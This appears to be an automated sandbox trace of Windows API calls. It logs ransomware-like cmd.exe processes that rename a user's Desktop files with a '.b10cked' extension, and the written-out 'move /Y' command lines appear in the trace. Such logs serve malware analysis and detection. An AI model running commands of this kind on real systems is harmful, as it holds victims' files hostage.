[0225.381] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f66c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f664, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f664*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.382] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.383] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.383] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.383] _wcsicmp (_String1="WTCCLC~1.WAV", _String2=".") returned 73 [0225.383] _wcsicmp (_String1="WTCCLC~1.WAV", _String2="..") returned 73 [0225.383] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclc~1.wav")) returned 0x20 [0225.383] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.383] SetErrorMode (uMode=0x0) returned 0x0 [0225.384] SetErrorMode (uMode=0x1) returned 0x0 [0225.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", nBufferLength=0x104, lpBuffer=0x22eff4, lpFilePart=0x22efdc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", lpFilePart=0x22efdc*="WTCCLC~1.WAV") returned 0x2a [0225.384] SetErrorMode (uMode=0x0) returned 0x1 [0225.384] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki")) returned 0x12 [0225.384] _wcsicmp (_String1="WTCCLC~1.WAV", _String2=".") returned 73 [0225.384] _wcsicmp (_String1="WTCCLC~1.WAV", _String2="..") returned 73 [0225.384] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclc~1.wav")) returned 0x20 [0225.384] SetErrorMode (uMode=0x0) returned 0x0 [0225.384] SetErrorMode (uMode=0x1) returned 0x0 [0225.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", nBufferLength=0x104, lpBuffer=0x22f470, lpFilePart=0x22f208 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", lpFilePart=0x22f208*="WTCCLC~1.WAV") returned 0x2a [0225.384] SetErrorMode (uMode=0x0) returned 0x1 [0225.384] SetErrorMode (uMode=0x0) returned 0x0 [0225.384] SetErrorMode (uMode=0x1) returned 0x0 [0225.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", nBufferLength=0x104, lpBuffer=0x22f678, lpFilePart=0x22f208 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", lpFilePart=0x22f208*="WtCCLcHrwK.wav.b10cked") returned 0x34 [0225.384] SetErrorMode (uMode=0x0) returned 0x1 [0225.384] SetLastError (dwErrCode=0x0) [0225.384] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav.b10cked")) returned 0xffffffff [0225.384] GetLastError () returned 0x2 [0225.385] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", fInfoLevelId=0x1, lpFindFileData=0x22eb84, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22eb84) returned 0x390e68 [0225.385] FindNextFileW (in: hFindFile=0x390e68, lpFindFileData=0x22eb84 | out: lpFindFileData=0x22eb84) returned 0 [0225.385] GetLastError () returned 0x12 [0225.385] FindClose (in: hFindFile=0x390e68 | out: hFindFile=0x390e68) returned 1 [0225.386] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV", fInfoLevelId=0x1, lpFindFileData=0x3a1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1bd8) returned 0x390e68 [0225.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", nBufferLength=0x104, lpBuffer=0x22ee1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked", lpFilePart=0x0) returned 0x34 [0225.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav", nBufferLength=0x104, lpBuffer=0x22ee1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav", lpFilePart=0x0) returned 0x2c [0225.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav")) returned 0x20 [0225.387] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav.b10cked"), dwFlags=0x3) returned 1 [0225.387] FindClose (in: hFindFile=0x390e68 | out: hFindFile=0x390e68) returned 1 [0225.387] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22edd0 | out: _Buffer=" 1") returned 9 [0225.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.388] GetFileType (hFile=0x7) returned 0x2 [0225.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ed5c | out: lpMode=0x22ed5c) returned 1 [0225.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22ed90 | out: lpConsoleScreenBufferInfo=0x22ed90) returned 1 [0225.388] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.389] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x22edd0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22edb4, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x22edb4*=0x1a) returned 1 [0225.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.389] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.389] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.389] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.389] SetConsoleInputExeNameW () returned 0x1 [0225.389] GetConsoleOutputCP () returned 0x1b5 [0225.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.389] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.390] exit (_Code=0) Process: id = "591" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33619 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33620 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33621 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33622 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 33623 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33624 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33625 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33626 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33627 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33628 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33912 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33913 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 33914 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 33915 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33916 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33917 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33918 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33919 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33920 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33921 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33922 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33923 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33924 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 33925 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33926 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33927 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33928 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33929 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 33930 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33931 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 33932 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 33933 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 816 os_tid = 0xcb4 [0225.570] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afc74 | out: lpSystemTimeAsFileTime=0x1afc74*(dwLowDateTime=0xba04d2e0, dwHighDateTime=0x1d440a9)) [0225.570] GetCurrentProcessId () returned 0xd60 [0225.570] GetCurrentThreadId () returned 0xcb4 [0225.570] GetTickCount () returned 0x3e455 [0225.570] QueryPerformanceCounter (in: lpPerformanceCount=0x1afc6c | out: lpPerformanceCount=0x1afc6c*=28235951332) returned 1 [0225.571] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.571] __set_app_type (_Type=0x1) [0225.571] __p__fmode () returned 0x76b331f4 [0225.571] __p__commode () returned 0x76b331fc [0225.571] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.571] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.572] GetCurrentThreadId () returned 0xcb4 [0225.572] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb4) returned 0x38 [0225.572] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.572] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.572] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.572] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.572] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afc04 | out: phkResult=0x1afc04*=0x0) returned 0x2 [0225.572] VirtualQuery (in: lpAddress=0x1afc3b, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.572] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afbd4, dwLength=0x1c | out: lpBuffer=0x1afbd4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.572] GetConsoleOutputCP () returned 0x1b5 [0225.573] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.573] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.573] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.573] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.573] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.574] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.574] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.574] GetEnvironmentStringsW () returned 0x2c0178* [0225.574] FreeEnvironmentStringsW (penv=0x2c0178) returned 1 [0225.574] GetEnvironmentStringsW () returned 0x2c0178* [0225.574] FreeEnvironmentStringsW (penv=0x2c0178) returned 1 [0225.574] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb74 | out: phkResult=0x1aeb74*=0x40) returned 0x0 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0xa0, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x0, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegCloseKey (hKey=0x40) returned 0x0 [0225.575] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb74 | out: phkResult=0x1aeb74*=0x40) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x0, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x9, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x9, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x9, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegCloseKey (hKey=0x40) returned 0x0 [0225.575] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.575] srand (_Seed=0x5b8863b9) [0225.575] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"" [0225.575] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"" [0225.576] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.576] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.576] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: 